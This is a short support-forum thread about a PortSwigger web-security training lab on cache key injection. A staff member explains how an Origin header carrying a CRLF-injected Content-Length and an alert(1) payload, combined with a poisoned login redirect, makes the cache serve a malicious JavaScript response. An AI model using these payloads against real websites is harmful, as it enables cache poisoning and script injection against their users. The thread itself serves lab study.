Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Cache key injection

Ariel | Last updated: Feb 03, 2021 08:48PM UTC

Hi want to know why on the JS page inside the origin header put 4 sign of dollar and not 2. GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1 Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

Uthman, PortSwigger Agent | Last updated: Feb 04, 2021 04:45PM UTC

Hi Ariel, In this lab, the caching key has the following structure: 'path?query$$origin' When we poison the cache on the 'js/localize.js' page with the Origin header, the caching key becomes: '/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$' After that, we poison the 'login?lang=en' so that it redirects to '/login/?lang=enx?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23' and '/js/localize.js' script is fetched with the same query. When the script is fetched after the redirection, since it is a same origin request, the origin header will be empty. So the actual key will be the redirection query + '$$' + (blank orgin) So the key will be the same: '/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$' Hence we receive the poisoned response.

Ariel | Last updated: Feb 07, 2021 01:27PM UTC